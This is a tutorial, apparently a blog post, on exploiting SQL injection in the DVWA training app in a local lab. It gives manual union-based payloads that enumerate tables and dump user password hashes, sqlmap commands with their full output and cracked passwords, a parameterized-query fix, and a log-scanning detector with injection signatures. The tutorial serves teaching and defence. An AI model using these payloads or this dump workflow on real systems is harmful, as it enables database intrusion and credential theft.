Prerequisites

Set DVWA's security level to Low.
Path: http://192.168.48.137/DVWA/security.php, or open it from the main page via the DVWA Security button.

DVWA local address: 192.168.48.137/DVWA
DVWA SQL injection local address: http://192.168.48.137/DVWA/vulnerabilities/sqli/

Manual injection

Clicking the View Source button on DVWA's SQL injection page shows the page source; from it we can see that after the submit button is clicked, the SQL executed is

SELECT first_name, last_name FROM users WHERE user_id = '$id';

Checking whether a SQL injection vulnerability exists

  • Normal input
    With the input 1, the SQL becomes
    SELECT first_name, last_name FROM users WHERE user_id = '1';

    and the corresponding user's details are returned.

  • Abnormal input 1
    With the input 1' and 1=1#, the SQL becomes
    SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#';

    The result is the same as for the normal input 1, but the SQL has executed the and 1=1 clause.
    Note the trailing #: it comments out whatever SQL follows it (here the closing quote and semicolon of the original query).

  • Abnormal input 2
    With the input 1' and 1=2#, the SQL becomes
    SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2#';

    Run on DVWA, this returns no result at all, which shows that the injected and clause took effect, and therefore that a SQL injection vulnerability exists here.
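
The root cause of the behaviour above is that the id value is spliced into the SQL string. The following is an added example, not DVWA's own code: it reproduces the string-concatenated lookup beside a parameterized version and runs both against an in-memory SQLite table constructed to mirror the users table. SQLite stands in for MySQL here, so the comment marker is `-- ` rather than MySQL's `#`; the probe inputs are otherwise the ones used above.

```python
"""Vulnerable vs. parameterized lookup, run against a constructed SQLite
stand-in for DVWA's users table (added example, not DVWA code)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample rows using the names DVWA ships with.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    # Same construction as the DVWA low-level page: the input is spliced
    # straight into the SQL text, so quotes and comments in it are parsed as SQL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    # Parameterized: the whole input is bound as one literal value and is
    # never parsed as SQL, whatever characters it contains.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def compare(user_id: str):
    """Return (rows from the vulnerable query, rows from the safe query)."""
    conn = make_db()
    return lookup_vulnerable(conn, user_id), lookup_safe(conn, user_id)


if __name__ == "__main__":
    # "1" matches in both; the and 1=1 / and 1=2 probes only change the
    # result of the vulnerable query.  SQLite uses "-- " where MySQL uses "#".
    for probe in ("1", "1' and 1=1-- ", "1' and 1=2-- "):
        vuln, safe = compare(probe)
        print(f"{probe!r:20} vulnerable={vuln} parameterized={safe}")
```

With the parameterized query the two probe strings simply fail to match any user_id, so the response no longer differs between the "1=1" and "1=2" cases, which is exactly the difference the detection step above relies on.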

Exploiting the SQL injection vulnerability

1. Determine the number of columns/fields with order by [column_num]

For example:

select first_name, last_name from users where user_id = '1' order by 1#;
select first_name, last_name from users where user_id = '1' order by 2#;
select first_name, last_name from users where user_id = '1' order by 3#;

When run through DVWA, the first two queries return results, but the third breaks the page with the message:

Notice: Array to string conversion in /var/www/html/DVWA/dvwa/includes/dvwaPage.inc.php on line 53Unknown column '3' in 'order clause'

So only two columns are available here (order by N refers to the N-th column of the SELECT list, which is why the union queries below supply exactly two values);

2. Use a union query to fetch other information: union select [sql1], [sql2]

For example:

# Notes:
# user() returns the current database user;
# database() returns the name of the database currently in use
select first_name, last_name from users where user_id = '1' union select user(), database()#;

Because step 1 showed that only two columns are available, only two functions are used here to fetch information;
the result is as follows:

ID: 1' union select user(), database()#
First name: admin
Surname: admin

ID: 1' union select user(), database()#
First name: root@localhost
Surname: dvwa

3. Get the tables in the database

Step 2 gave the name of the database currently in use; next, get the tables in that database. The SQL to construct is:

select first_name,last_name from users where user_id = '1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';

Result:

ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: admin
Surname: admin

ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: guestbook
Surname: dvwa

ID: 1' union select table_name, table_schema from information_schema.tables where table_schema = 'dvwa'#';
First name: users
Surname: dvwa

As can be seen, the dvwa database has two tables: guestbook and users.

4. Get the column names of a table

Having obtained the table names in step 3, now get the name of each column in the users table.
Construct the following SQL:

# This SQL fetches the column names of the users table
select first_name,last_name from users where user_id = '1' union select 'column_name', column_name from information_schema.columns where table_name='users'#';

Result:

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: admin
Surname: admin

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: user_id

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: first_name

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: last_name

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: user

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: password

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: avatar

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: last_login

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: failed_login

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: CURRENT_CONNECTIONS

ID: 1' union select 'column_name', column_name from information_schema.columns where table_name='users'#
First name: column_name
Surname: TOTAL_CONNECTIONS

The Surname in each result is one column name of the users table;

5. Get the data in the table

Step 4 gave the column names of the users table, so the values of its user and password fields can now be fetched.
Construct the following SQL:

select first_name,last_name from users where user_id = '1' union select user, password from users;#';

Result:

ID: 1' union select user, password from users;#
First name: admin
Surname: admin

ID: 1' union select user, password from users;#
First name: admin
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

ID: 1' union select user, password from users;#
First name: gordonb
Surname: e99a18c428cb38d5f260853678922e03

ID: 1' union select user, password from users;#
First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b

ID: 1' union select user, password from users;#
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

ID: 1' union select user, password from users;#
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
Surname: 5f4dcc3b5aa765d61d8327deb882cf99

Five users and their corresponding hashed password strings were obtained.

sqlmap injection

A Kali virtual machine is used here to run sqlmap.

Installing Kali

A VMware image of Kali can be downloaded from the official Kali site; download it and open it in VMware. Default username and password: kali/kali

Brief description of sqlmap parameters

  • -u: the URL to test;
  • --cookie: the cookie to send with requests;
  • --dbs: list the databases;
  • -D: specify the target database name;
  • --tables: list the tables in the database;
  • -T: specify the target table name;
  • --columns: list the table's columns;
  • --dump: dump all the data;

Basic sqlmap usage

1. Detect the vulnerability

sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low"

The output is as follows:

[*] starting @ 08:32:26 /2023-11-11/

[08:32:26] [INFO] resuming back-end DBMS 'mysql'
[08:32:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 5235=5235#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: id=1' AND GTID_SUBSET(CONCAT(0x71706b7671,(SELECT (ELT(7859=7859,1))),0x7176717071),7859)-- oXqJ&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9183 FROM (SELECT(SLEEP(5)))ZVZk)-- PKcd&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x71706b7671,0x486575564741714b584b7a4d65674a726c43744271566a746e6477414a71655778586c636e7a4d48,0x7176717071),NULL#&Submit=Submit
---
[08:32:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 8
web application technology: PHP 7.2.24, Apache 2.4.37
back-end DBMS: MySQL >= 5.6
[08:32:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.48.137'

[*] ending @ 08:32:26 /2023-11-11/

Several Types appear above; each indicates a kind of injection that can be used against the id parameter. The injection modes they denote are:

  • Type: boolean-based blind: the result is inferred from whether the page's response shows the injected condition to be true or false;
  • Type: error-based: the response returns an error message, or the result of the injected statement is returned directly in the response.
  • Type: time-based blind: nothing can be inferred from the response content; a conditional delay statement is injected and whether the delay executed (i.e. whether the response time increased) is observed instead.
  • Type: UNION query: injection where a union can be used to append the attacker's own SELECT.
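
From the defender's side, each of these four types leaves a recognisable trace in the web server's access log. The following is an added example, not part of the original post and not sqlmap code: it parses Apache combined-format log lines, decodes the query string, matches the same payload shapes sqlmap reported above (boolean comparison, SLEEP(), GTID_SUBSET(), UNION SELECT, comment terminator), and summarises hits per client so a scanner burst stands out. The log lines, the client addresses and the User-Agent strings are constructed for the example.

```python
"""Flag SQL-injection probes in access-log lines and summarise them per
client (added example; log lines and addresses are constructed)."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample log: one normal request and four probes shaped like the
# sqlmap payloads reported above, URL-encoded as a scanner would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2023:08:32:26 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Nov/2023:08:32:26 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27%20OR%20NOT%205235%3D5235%23&Submit=Submit HTTP/1.1" 200 4100 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [11/Nov/2023:08:32:26 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27%20AND%20GTID_SUBSET%28CONCAT%280x71%2C1%29%2C7859%29--%20oXqJ&Submit=Submit HTTP/1.1" 200 4100 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [11/Nov/2023:08:32:26 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27%20AND%20%28SELECT%209183%20FROM%20%28SELECT%28SLEEP%285%29%29%29ZVZk%29--%20PKcd&Submit=Submit HTTP/1.1" 200 4100 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.9 - - [11/Nov/2023:08:32:27 +0000] "GET /DVWA/vulnerabilities/sqli/?id=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%23&Submit=Submit HTTP/1.1" 200 4100 "-" "sqlmap/1.7 (https://sqlmap.org)"
"""

# Apache combined format: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One signature per injection type reported by sqlmap above, plus the
# comment terminator (# or -- ) every payload uses to discard the tail of the query.
SIGNATURES = {
    "boolean-based": re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "time-based": re.compile(r"\bSLEEP\s*\(", re.I),
    "union": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "comment-terminator": re.compile(r"(?:#|--\s)"),
}


def classify(line: str):
    """Return (client ip, sorted signature names hit) for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    hits = set()
    for values in parse_qs(query, keep_blank_values=True).values():
        for raw in values:
            # parse_qs decodes once; decoding again also catches double-encoded payloads.
            decoded = unquote_plus(raw)
            for name, rx in SIGNATURES.items():
                if rx.search(decoded):
                    hits.add(name)
    return m.group("ip"), sorted(hits)


def scan(log_text: str):
    """Per-client summary: {ip: {"requests": n, "flagged": n, "types": [...]}}."""
    summary = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result is None:
            continue
        ip, hits = result
        entry = summary.setdefault(ip, {"requests": 0, "flagged": 0, "types": set()})
        entry["requests"] += 1
        if hits:
            entry["flagged"] += 1
            entry["types"].update(hits)
    for entry in summary.values():
        entry["types"] = sorted(entry["types"])
    return summary


if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, entry)
```

The per-client count matters more than any single signature: sqlmap issues dozens of requests in a few seconds while it fingerprints the parameter, so one address producing many flagged requests against the same path is the stronger signal. The default sqlmap User-Agent is a cheap extra indicator but is trivially overridden, so the payload patterns should not depend on it.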

2. Get the database names

sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" --dbs

Result:

available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys

3. Get the tables of a given database

sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa --tables

Result:

Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

4. Get the contents of a given table

4.1. Get the table's columns

sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa -T users --columns

Result:

Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int         |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int         |
+--------------+-------------+

4.2. Get all of the table's data

sqlmap -u "http://192.168.48.137/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=sgbknd34l76prnsb9dcl4sevj9; security=low" -D dvwa -T users --dump

Result (password cracking was chosen when sqlmap prompted for it during the run):

Database: dvwa
Table: users
[5 entries]
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| user_id | user    | avatar                           | password                                    | last_name | first_name | last_login          | failed_login |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+
| 1       | admin   | /DVWA/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      | 2023-11-08 22:49:01 | 0            |
| 2       | gordonb | /DVWA/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     | 2023-11-08 22:49:01 | 0            |
| 3       | 1337    | /DVWA/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       | 2023-11-08 22:49:01 | 0            |
| 4       | pablo   | /DVWA/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      | 2023-11-08 22:49:01 | 0            |
| 5       | smithy  | /DVWA/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        | 2023-11-08 22:49:01 | 0            |
+---------+---------+----------------------------------+---------------------------------------------+-----------+------------+---------------------+--------------+

Last modified: 11 November 2023
